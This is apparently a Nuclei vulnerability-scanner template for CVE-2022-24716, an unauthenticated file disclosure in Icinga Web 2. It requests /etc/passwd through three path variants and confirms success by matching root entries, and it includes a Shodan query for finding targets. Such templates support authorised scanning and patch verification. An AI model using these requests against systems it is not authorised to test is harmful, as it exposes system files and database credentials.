40 lines
1.2 KiB
YAML
40 lines
1.2 KiB
YAML
id: CVE-2022-24716
|
|
|
|
info:
|
|
name: Icinga Web 2 - Arbitrary File Disclosure
|
|
author: DhiyaneshDK
|
|
severity: high
|
|
description: |
|
|
Icinga Web 2 is an open source monitoring web interface, framework and command-line interface. Unauthenticated users can leak the contents of files of the local system accessible to the web-server user, including `icingaweb2` configuration files with database credentials.
|
|
remediation: This issue has been resolved in versions 2.9.6 and 2.10 of Icinga Web 2. Database credentials should be rotated.
|
|
reference:
|
|
- https://github.com/JacobEbben/CVE-2022-24716/blob/main/exploit.py
|
|
metadata:
|
|
max-request: 3
|
|
shodan-query: title:"Icinga"
|
|
tags: cve,cve2023,icinga,lfi
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/lib/icinga/icinga-php-thirdparty/etc/passwd"
|
|
- "{{BaseURL}}/icinga2/lib/icinga/icinga-php-thirdparty/etc/passwd"
|
|
- "{{BaseURL}}/icinga-web/lib/icinga/icinga-php-thirdparty/etc/passwd"
|
|
|
|
stop-at-first-match: true
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
part: body
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- text/plain
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|